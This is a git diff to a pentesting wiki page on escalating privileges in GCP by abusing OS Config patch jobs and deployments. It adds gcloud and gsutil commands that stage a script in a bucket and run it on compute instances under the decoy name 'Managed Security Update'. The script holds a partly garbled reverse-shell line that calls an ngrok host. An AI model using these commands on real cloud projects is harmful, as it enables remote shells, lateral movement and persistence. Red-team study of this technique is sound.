diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md index c1c12e128c..38cb614006 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md @@ -84,17 +84,41 @@ The exploit script for this method can be found [here](https://github.com/RhinoS If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. -If you want to manually exploit this you will need to create either a [patch job](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_job.json) or [deployment](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_deployment.json) for a patch job run: +Note that at the moment you **don't need `astAs` permission** over the SA attached to the instance. -`gcloud compute os-config patch-jobs execute --file=patch.json` +If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_deployment.json)**.**\ +For a patch job run: + +{% code overflow="wrap" %} +```python +cat > /tmp/patch-job.sh <& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1 +EOF + +gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh + +# Get the generation number +gsutil ls -a gs://readable-bucket-by-sa-in-instance + +gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \ + --instance-filter-names=zones/us-central1-a/instances/ \ + --pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh# \ + --reboot-config=never \ + --display-name="Managed Security Update" \ + --duration=300s +``` +{% endcode %} To deploy a patch deployment: -`gcloud compute os-config patch-deployments create my-update --file=patch.json` +```bash +gcloud compute os-config patch-deployments create ... +``` -Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to detect lax permissions and automatically move laterally. +The tool [patchy](https://github.com/rek7/patchy) could been used in the past for exploiting this misconfiguration (but now it's not working). -**You can also abuse this for persistence.** +**An attacker could also abuse this for persistence.** ### `compute.machineImages.setIamPolicy`